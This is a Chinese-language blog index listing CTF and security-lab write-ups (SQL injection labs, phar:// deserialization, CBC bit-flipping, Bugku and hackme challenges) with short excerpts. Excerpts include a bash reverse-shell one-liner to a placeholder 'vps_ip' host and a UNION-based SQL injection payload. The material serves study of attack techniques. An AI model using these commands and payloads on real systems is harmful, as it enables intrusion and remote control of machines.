博客搬家啦

博客搬家咯,溜了溜了,搬去github了 https://xi4or0uji.github.io/

2018-10-23 21:04:15

阅读数 89

评论数 0

第一届巅峰极客

这个比赛真的是神仙打架,肉鸡划水到底,记下复现过程 misc warmup 图片放去stegsolve看一下可以看见最低位有异常数据(最上面 具体分析就会看见 两个ook编码,一个brainfuck编码,剩下的就是解码了 这里有个注意的是,他的编码每一句都在后面加了个英...

2019-03-09 22:45:44

阅读数 553

评论数 2

一个phar://的漏洞

前段时间打了个护网杯,题目质量是真的高,肉鸡又菜了一整场,遇到了一个不太会的东西,复现了一波,记录下好吧。 这个鬼东西就是phar://的序列化的漏洞 介绍一下 phar://跟php://filter 、data://那些一样,都是流包装,可以将一组php文件进行打包,可以创建默认执行的st...

2018-10-17 22:41:22

阅读数 1261

评论数 0

linux下反弹shell

最近做了几题都是反弹shell,总结一哈 bash bash -i >& /dev/tcp/vps_ip/端口号 0>&1 bash -i 生成一个交互式的子进程 &表示在L...

2018-09-25 20:55:18

阅读数 509

评论数 0

cbc字节翻转攻击

本来很久之前就应该把它学了,但是不能静下心看完,拖到现在......... 今天上课的时候跟cg一起看,抱着神仙的大腿将它看完了,cg牛逼!! 首先我们先看下他的加密过程 可以看到,它先将明文进行分块,第一块与初始变量异或,然后秘钥进行加密,得到的密文再与第二块明文进行异或,继续秘钥加密...

2018-09-19 20:37:34

阅读数 559

评论数 1

bee-box

这篇博客就是为了记下bee-box做题过程,随便记记,免得忘了 安装 先去官网下载了,然后分个新的盘单独放进去,打开虚拟机,双击bee-box.vmx就能安装了 打开里面的火狐会自动跳去一个登录界面,默认账号和密码是bee/bug,登录然后就能做题了 我是美丽的分割线-----------...

2018-09-18 21:21:24

阅读数 1325

评论数 0

hackme(web wp)

oj说了不要直接给flag,所以就只写思路啦~ hide and seek 源码就有了 Guestbook 这题是SQL注入 看数据库 ?mod=read&id=-1 union select 1,2,database(),4# 然后就看到数据库是g8 表 ...

2018-09-06 14:49:49

阅读数 770

评论数 1

solve me(web wp)

warm up 逆着解下码 <?php $chars = "1wMDEyY2U2YTY0M2NgMTEyZDQyMjAzNWczYjZgMWI4NTt3YWxmY="; echo hex2bin(strrev(bin2hex((b...

2018-09-02 23:06:58

阅读数 170

评论数 0

bugku(代码审计 wp)

extract变量覆盖 源码 <?php $flag='xxx'; extract($_GET); if(isset($shiyan)){ $content=trim(file_get_contents($flag)); if($shiyan==$con...

2018-09-02 00:25:27

阅读数 565

评论数 0

bugku(web进阶 wp)

phpcmsv9 这题叫道理应该是考phpcmsv9的漏洞的,但是挂了,连注册都注册不了....... 不过有个非预期解,访问一个robots.txt居然就看到flag了,交一发还是对的....... 正确的解法应该是找到注册页面 填写了以后在post数据最后加一句&amp...

2018-09-02 00:10:52

阅读数 1034

评论数 0

网鼎杯第二场 wp

本来应该是高校组,结果报错了,弄成了第二场........尴尬........ cal(web) 这题在url后面加robots.txt可以看到python报错,所以应该是python命令执行 试下1+1|ls,发现触发waf,然后继续试下读文件的函数,一波尝试后获得flag 1+1+in...

2018-08-31 23:52:36

阅读数 162

评论数 0

BugkuCTF(分析 wp)

flag 这题进去一直看,可以看到黑客最后成功上传了一句话木马,然后就下了一个flag.txt,继续找下去就能看到flag了 中国菜刀 追踪tcp流可以看见有个flag的压缩包 binwalk分离一下 打开就看到flag了 抓到一只苍蝇  ...

2018-08-30 23:21:59

阅读数 911

评论数 0

BugkuCTF(web wp)

web2 源码就有flag 文件上传测试 服务器挂了兼忘了当初怎么做了(捂脸 计算器 这题是要你计算一个数学公式的答案,但是发现只能输一个数字,改下maxlength,然后就能输入就有flag了 web基础$_GET 这题其实考get方法传参,get方法发个flag,payload:...

2018-08-25 16:32:21

阅读数 1367

评论数 1

南邮ctf(web wp)

签到 源代码就有了 md5 collision 传一个字符串,值跟QNKCDZO一样但是又不是它的就行了 签到2 改了本地的maxlength就能输进去zhimakaimen然后拿到flag了 这题不是WEB 把图片下载下来丢去010editor就能看到flag了 层层递进 ...

2018-08-20 17:35:46

阅读数 1398

评论数 0

jarvis oj(web wp)

api调用 这题是slim架构的xxe漏洞,看博客做题2333 https://www.leavesongs.com/PENETRATION/slim3-xxe.html simple injection username和password是注入点,然后就是确认怎么注入了 题目是...

2018-08-19 14:54:45

阅读数 972

评论数 0

sqli-labs (less25-less28a)

这里开始就是各种花式绕waf了,肉鸡打算把它们放在一篇,所以可能会很长 less 25 or && and 至于怎么绕? 大小写:Or、oR 重复:oorr、anandd 符号:&&、|| ...

2018-08-04 17:22:04

阅读数 105

评论数 0

sqli-labs (less23-less24)

less 23 报错注入&过滤注释符 这关后台查询语句是select xxx form xxx where id='$_GET['id']' limit 0,1 讲道理其实跟之前的差不多的,只是对--,#这些注释的符号进行了过滤 所以最后的payload就是 ?i...

2018-08-04 14:43:28

阅读数 219

评论数 0

2017ciscn

misc warmup 这题是盲水印加密,拿到一个加密的压缩包和一张png图片,png加密成zip包,然后明文攻击原来的压缩包(时间贼久,等了一个晚上才把压缩包解密了.......... 看到两张差不多的图 丢去stegsolve XOR一下可以看见一堆横纹,然后应该就是盲水印了 最...

2018-08-04 14:11:19

阅读数 324

评论数 0

sqli-labs (less20-less22)

less 20 cookie注入 这关首先看源码可以看见首次登录,后台会把username放去cookie,再次登录的时候,如果cookie没过期,就会去cookie里面取值,然后进行查询,至于sql语句就是 所以我们只要去改掉他的cookie就可以拿到数据库的东西了 最后改出来是...

2018-08-01 22:35:23

阅读数 274

评论数 0

sqli-labs (less18-less19)

less 18 头部注入:user_agent 这里不补充http头的知识了,直接看源码可以看到,uname和passwd都有check_input函数检查,所以直接这两个参数注入是不行的了,然后再继续看下去 有句sql语句有ip_address和uagent两个参数,而且前面没有检查,...

2018-08-01 17:44:07

阅读数 361

评论数 0

提示
确定要删除当前文章?
取消 删除